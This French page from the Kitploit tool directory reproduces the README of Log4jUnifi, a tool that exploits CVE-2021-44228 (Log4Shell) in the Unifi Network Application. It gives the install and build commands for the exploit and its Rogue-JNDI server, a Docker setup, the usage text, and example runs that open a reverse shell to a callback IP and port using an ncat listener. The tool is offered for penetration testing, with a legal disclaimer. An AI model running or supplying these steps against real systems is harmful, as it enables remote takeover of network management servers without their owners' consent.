Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Log4jUnifi — Exploitation de CVE-2021-44228 dans Unifi Network Application pour exécution de code à distance et plus. | Kitploit
Outils/GitHubGitHub/puzzlepeaches/log4junifi
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubpuzzlepeaches/log4junifi

Log4jUnifi

Exploitation de CVE-2021-44228 dans Unifi Network Application pour exécution de code à distance et plus.

Voir le dépôt
17031il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Log4jUnifi

Exploitation de CVE-2021-44228 dans l'application réseau Unifi pour l'exécution de code à distance et plus.

  • Un autre Log4j dans le feu : Unifi

Pourquoi ?

Les preuves de concept pour cette vulnérabilité sont dispersées et doivent être réalisées manuellement. Ce dépôt automatise le processus d'exploitation. Consultez l'article de blog ci-dessus pour des conseils sur la post-exploitation.

Installation

Ce dépôt peut être utilisé manuellement ou avec Docker.

Installation manuelle

Pour télécharger et exécuter l'exploit manuellement, suivez les étapes suivantes. Tout d'abord, assurez-vous que Java et Maven sont installés sur votre machine d'attaque. Pour ce faire avec apt sur les systèmes basés sur Debian, exécutez la commande suivante :

root@kitploit:~
apt update && apt install openjdk-11-jre maven

Clonez le dépôt GitHub et installez toutes les dépendances Python :

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jUnifi \
    && cd Log4jUnifi && pip3 install -r requirements.txt

Depuis la racine du dépôt Log4jUnifi, compilez le projet Rogue-Jndi avec la commande ci-dessous :

root@kitploit:~
mvn package -f utils/rogue-jndi/

Installation Docker

Tout d'abord, assurez-vous que Docker est installé sur votre machine d'attaque. (Je ne vais pas vous expliquer comment faire)

Ensuite, exécutez la commande suivante pour cloner le dépôt et construire l'image Docker que nous allons utiliser.

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jUnifi \
    && cd Log4jUnifi && docker build -t log4junifi .

Pour exécuter le conteneur, lancez une commande similaire à la suivante avec vos drapeaux de ligne de commande ajoutés. Notez que le conteneur ne récupérera pas le reverse shell. Vous devez créer un écouteur ncat dans une session shell séparée :

root@kitploit:~
docker run -it -v $(pwd)/loot:/Log4jUnifi/loot -p 8090:8090 -p 1389:1389 log4junifi \ 
    -u https://unifi.acme.com:8443 -i 192.168.1.1 -p 4444

Utilisation

root@kitploit:~
usage: exploit.py [-h] -u URL -i CALLBACK -p PORT

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Unifi Network Manager base URL
  -i CALLBACK, --ip CALLBACK
                        Callback IP for payload delivery and reverse shell.
  -p PORT, --port PORT  Callback port for reverse shell.

Exemples

Obtenez un reverse shell en utilisant l'outil installé sur votre système local :

root@kitploit:~
python3 exploit.py -u https://unifi.acme.com:8443 -i 10.10.10.1 -p 4444

Avertissement

Cet outil est conçu pour être utilisé lors de tests de pénétration ; l'utilisation de cet outil pour attaquer des cibles sans consentement mutuel préalable est illégale. Il est de la responsabilité de l'utilisateur final de se conformer à toutes les lois locales, étatiques et fédérales applicables. Les développeurs déclinent toute responsabilité et ne sont pas responsables de toute mauvaise utilisation de ce programme.

Télécharger l’outil